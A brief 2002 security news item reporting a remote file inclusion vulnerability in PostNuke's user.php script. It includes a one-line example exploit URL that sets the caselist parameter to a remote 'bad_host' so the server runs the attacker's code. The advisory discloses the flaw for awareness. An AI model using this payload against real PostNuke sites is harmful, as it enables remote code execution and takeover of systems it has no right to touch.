Users login

Create an account »


Users login

Home » Hacking News » PostNuke caselist Arbitrary Module Include Vulnerability

PostNuke caselist Arbitrary Module Include Vulnerability

by Nikola Strahija on April 1st, 2002 A vulnerability has been reported in some versions of PostNuke. Reportedly, it is possible to force the script user.php to include arbitrary modules. These files may be hosted remotely and contain arbitrary code, which will then be executed by the vulnerable system.

Other versions of PostNuke may share this vulnerability. This has not, however, been confirmed.

Remote: Yes

Exploit: http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host

Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.


Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »